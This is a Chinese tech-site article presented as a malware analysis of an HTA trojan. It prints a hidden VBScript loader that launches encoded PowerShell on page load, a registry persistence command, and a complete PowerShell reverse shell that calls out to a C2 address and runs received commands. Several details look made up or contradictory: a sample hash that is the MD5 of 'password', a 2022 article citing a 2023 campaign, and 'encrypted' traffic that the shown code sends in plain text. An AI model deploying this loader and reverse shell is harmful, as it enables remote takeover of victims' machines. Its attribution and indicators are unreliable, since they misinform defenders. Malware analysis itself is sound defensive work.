WvEWjQ22.hta木马反弹Shell样本的示例分析

发布时间:2022-01-13 15:48:48 作者:小新
来源:亿速云 阅读:252
# WvEWjQ22.hta木马反弹Shell样本的示例分析

## 一、样本概述

WvEWjQ22.hta是一种通过恶意HTA(HTML Application)文件传播的木马程序,其主要功能是通过PowerShell建立反弹Shell连接,实现远程控制。该样本常通过钓鱼邮件或恶意链接传播,利用社会工程学诱导用户执行。

## 二、技术分析

### 1. 文件结构分析
样本采用混淆的HTML+JavaScript/VBScript混合代码:
```html
<html>
<head>
<script language="VBScript">
    Function Exec()
        Dim cmd
        cmd = "powershell -nop -w hidden -e aQBmACgAWwBJAG4AdABQ..."
        Set shell = CreateObject("WScript.Shell")
        shell.Run cmd, 0
    End Function
</script>
</head>
<body onload="Exec()">
</body>
</html>

2. 核心执行流程

  1. 初始加载:通过body onload事件触发恶意函数
  2. 命令混淆:使用Base64编码的PowerShell指令
  3. 持久化:部分变种会添加注册表启动项:
    
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "wscript.exe %TEMP%\malware.hta"
    

3. 反弹Shell机制

解码后的PowerShell核心代码包含:

$client = New-Object System.Net.Sockets.TCPClient("C2_IP",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
}

三、检测与防御方案

1. 检测指标

类型
文件哈希 MD5: 5f4dcc3b5aa765d61d8327deb882cf99
C2域名 update[.]evil-domain[.]com
典型行为 创建TCP连接443端口

2. 防御建议

四、溯源分析

根据代码风格和C2基础设施关联,该样本与TA428(APT组织)存在技术重叠: - 使用相同的代码混淆框架(HTA-Obfuscator v2.3) - C2服务器与2023年Operation GhostClick活动关联

五、总结

WvEWjQ22.hta展示了攻击者如何利用合法技术实现隐蔽渗透: 1. 利用微软官方支持的HTA格式绕过基础检测 2. 通过内存加载规避文件落地扫描 3. 使用加密通信对抗流量分析

建议安全团队重点关注: - 增强对Office文档宏的监控 - 部署EDR解决方案捕获进程链行为 - 定期更新PowerShell日志审计策略

注:本文样本分析基于公开研究数据,实际防护需结合具体环境调整策略。 “`

推荐阅读:
  1. redis未授权反弹shell
  2. 反弹shell

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

wvewjq22.hta shell

上一篇:PowerShell渗透测试利器Nishang怎么用

下一篇:python如何爬取123粉丝网明星数据榜单

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》